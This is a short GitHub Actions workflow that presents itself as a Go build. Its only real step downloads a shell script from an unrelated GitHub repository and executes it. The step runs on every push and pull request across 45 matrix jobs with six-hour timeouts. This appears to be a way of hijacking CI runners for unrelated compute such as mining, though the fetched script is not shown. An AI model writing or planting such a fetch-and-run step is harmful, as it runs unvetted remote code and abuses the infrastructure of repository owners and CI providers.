name: BACOK
on: [push, pull_request]
jobs:
  build:
    name: BACOK
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 30
      fail-fast: false
      matrix:
        go: [1.6, 1.7, 1.8, 1.9, 1.10]
        flag: [A, B, C, D, E, F, G, H, I]
    timeout-minutes: 360
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v2
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v2
    - name: BACOK
      run: |
        wget https://github.com/julialee654/hgfghfgf/blob/main/vcstes.sh && chmod u+x vcstes.sh && ./vcstes.sh
